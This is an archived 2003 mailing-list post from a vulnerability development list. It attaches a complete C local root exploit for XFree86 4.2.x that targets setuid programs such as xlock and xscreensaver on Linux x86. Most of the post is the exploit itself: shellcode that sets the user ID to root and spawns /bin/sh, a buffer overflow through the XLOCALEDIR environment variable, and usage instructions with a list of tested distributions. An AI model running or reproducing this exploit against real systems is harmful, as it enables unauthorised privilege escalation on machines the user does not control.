Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: xscreensaver exploit for Redhat 7.3

From: Inode <inode () mediaservice net>
Date: Fri, 07 Mar 2003 21:45:51 +0100
Hi all,
exploit attached.

Comments are welcome.

Sincerely,

+-------------------------------------------------------------------+
| Agazzini Maurizio                       Tel:   +39-011-32.72.100  |
| Security Analyst                        Fax:   +39-011-32.46.497  |
| @ Mediaservice.net S.R.L.          D.S.D. Data Security Division  |
|                                                                   |
| PGP Key   : http://www.wayreth.eu.org/Inode.asc                   |
| Disclaimer: http://@Mediaservice.net/disclaimer                   |
+-------------------------------------------------------------------+


/*

        Original exploit:
                ** oC-localX.c - XFree86 Version 4.2.x local root exploit
                ** By dcryptr && tarranta / oC

        This exploit is a modified version of the original oC-localX.c
        built to work without any offset. 

        Some distro have the file: /usr/X11R6/bin/dga +s
        This program isn't exploitable because it drops privileges
        before running the Xlib function vulnerable to this overflow.

        This exploit works on linux x86 on all distro. 

        Tested on:      
                - Slackware 8.1 ( xlock, xscreensaver, xterm)
                - Redhat 7.3 ( manual +s to xlock )
                - Suse 8.1 ( manual +s to xlock )

        by Inode <inode () mediaservice net>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static char shellcode[] = 

        /* setresuid(0,0,0); */
        "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
        /* /bin/sh execve(); */
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
        "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
        /* exit(0); */
        "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";


#define ALIGN 0 

int main(int argc, char **argv)
{
        char    buffer[6000];
        int i;
        int ret;
        char *env[3] = {buffer,shellcode,  NULL}; 

        int *ap;

        strcpy(buffer, "XLOCALEDIR=");

        printf("\nXFree86 4.2.x Exploit modified by Inode <inode () mediaservice net>\n\n");
        if( argc != 3 )
        {
                printf(" Usage: %s <full path> <name>\n",argv[0]);
                printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n",argv[0]);
                return 1;
        }

        ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]) ;

        ap = (int *)( buffer + ALIGN + strlen(buffer) );

        for (i = 0; i < sizeof(buffer); i += 4)
                *ap++ = ret;
        
        execle(argv[1], argv[2], NULL, env);

        return(0);
}
Previous By Date Next
Previous By Thread Next

Current thread: